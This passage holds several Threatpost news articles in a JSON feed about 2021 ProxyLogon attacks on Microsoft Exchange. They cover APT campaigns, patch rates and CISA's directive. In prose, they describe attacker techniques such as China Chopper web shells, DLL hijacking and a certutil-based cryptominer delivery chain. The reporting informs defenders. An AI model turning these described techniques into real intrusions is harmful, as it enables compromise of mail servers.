And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. 
Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. 
\u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowik, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": 
"https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dormann of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. 
Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. 
Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to a [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its 
[post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub](<https://twitter.com/taviso/status/1370068702817783810>), which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. 
[pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which they used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nThe Microsoft Active Protections Program (MAPP) delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). 
\u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. 
For instance, the APT Hafnium, first flagged by Microsoft, is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. 
\u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious 
security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. 
Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nHuntress Labs, for instance, told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTs besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 
3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. 
And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of 
attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report.\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. 
Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. 
Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. 
_**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. 
[pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APTs) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. 
This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\nImage source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. 
Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. 
\u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied,\u201d Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. 
